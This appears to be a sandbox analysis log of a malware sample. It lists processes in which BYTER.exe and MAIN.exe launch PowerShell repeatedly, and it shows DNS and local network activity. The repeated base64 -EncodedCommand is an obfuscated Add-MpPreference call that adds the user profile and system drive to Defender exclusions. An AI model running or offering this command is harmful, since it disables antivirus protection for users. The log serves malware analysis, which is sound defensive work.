"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
N/A 10.0.2.15:9090 tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
N/A 10.0.2.15:9090 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
N/A 10.0.2.15:9090 tcp
US 8.8.8.8:53 73.90.14.23.in-addr.arpa udp
